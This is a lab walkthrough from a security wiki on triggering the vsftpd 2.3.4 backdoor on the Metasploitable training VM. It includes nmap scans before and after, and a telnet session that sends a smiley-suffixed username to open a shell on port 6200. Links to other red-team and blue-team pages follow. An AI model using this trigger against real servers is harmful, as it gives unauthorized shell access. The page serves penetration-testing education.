Metasploitable/VSFTP
From charlesreid1
The Background
VSFPT is an ftp server program. The particular version of VSFTP included on the Metasploitable virtual machine contains a vulnerability that opens a backdoor shell.
If a client attempts to connect using a username that ends in a smiley :), it opens a backdoor shell listening on port 6200. (Kind of like 2600 - get it?)
Opening the Backdoor
The procedure for opening a backdoor on port 6200 with VSFTP is as follows:
We begin by scanning the Metasploitable virtual machine at 10.0.0.27, to show that port 6200 is closed:
root@morpheus:~# nmap -sS -sV -A -p 6200 10.0.0.27 Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 06:29 PDT Nmap scan report for 10.0.0.27 Host is up (0.00083s latency). PORT STATE SERVICE VERSION 6200/tcp closed unknown MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.83 ms 10.0.0.27 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.96 seconds
Now, in another window, we open the backdoor:
root@morpheus:~# telnet 10.0.0.27 21 Trying 10.0.0.27... Connected to 10.0.0.27. Escape character is '^]'. 220 (vsFTPd 2.3.4) user backdoored:) 331 Please specify the password. pass doesnotmatter
You can close that window - you're done with it.
Now take a look at the same port 6200 with nmap:
root@morpheus:~# nmap -sS -sV -A -p 6200 10.0.0.27 Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 06:30 PDT WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? WARNING: RST from 10.0.0.27 port 6200 -- is this port really open? Nmap scan report for 10.0.0.27 Host is up (0.00088s latency). PORT STATE SERVICE VERSION 6200/tcp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port6200-TCP:V=7.01%I=7%D=3/25%Time=56F53D70%P=x86_64-pc-linux-gnu%r(Ge SF:nericLines,42,"sh:\x20line\x201:\x20\r:\x20command\x20not\x20found\nsh: SF:\x20line\x202:\x20\r:\x20command\x20not\x20found\n"); MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:linux_kernel:2.4.21 OS details: Linux 2.4.21 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.88 ms 10.0.0.27 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.94 seconds
 |
Metasploit any and all resources related to metasploit on this wiki
Category:Metasploit - pages labeled with the "Metasploit" category label MSF/Wordlists - wordlists that come bundled with Metasploit MSFVenom - msfvenom is used to craft payloads Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload.
Category:Security · Category:Metasploit · Category:Kali
|
|
Metasploitable: The Red Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.
Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres
Exploiting VSFTP Backdoor: Metasploitable/VSFTP SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force SSH Penetration with Keys: Metasploitable/SSH/Keys SSH Penetration with Metasploit: Metasploitable/SSH/Exploits Brute-Forcing Exploiting NFS: Metasploitable/NFS Exploiting DNS Bind Server: Metasploitable/DNS Bind
Metasploitable Services: distcc: Metasploitable/distcc
Metasploitable Apache: Exploiting Apache (with Metasploit): Metasploitable/Apache Exploiting Apache (with Python): Metasploitable/Apache/Python Tor's Hammer DoS Attack: Metasploitable/TorsHammer * Apache DAV: Metasploitable/Apache/DAV * Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote
Metasploitable Memory: General approach to memory-based attacks: Metasploitable/Memory Investigating memory data: Metasploitable/Volatile Data Investigation Dumping Memory from Metasploit: Metasploitable/Dumping Memory
Metasploitable Fuzzing: (Have not done much work on fuzzing Metasploitable...)
Category:Security · Category:Metasploit · Category:Metasploitable · Category:Kali
|
|
Metasploitablue: The Blue Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions.
Hence the name, Metasploita-blue. Overview: Metasploitable/Defenses Metasploitable/Defenses/Stopping · Metasploitable/Defenses/Detecting
Metasploitable On-Machine Defenses: Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation Linux Artifact Investigation: Metasploitable/Artifact Investigation Linux Iptables Essentials: Metasploitable/Iptables Firewall Assurance and Testing: Metasploitable/Firewall Password Assessment: Metasploitable/Password Assessment Standard Unix Ports: Unix/Ports
Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat Nmap (Blue Team): Metasploitable/Nmap Network Traffic Analysis: Metasploitable/Network Traffic Analysis Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns Snort IDS: Metasploitable/Snort
|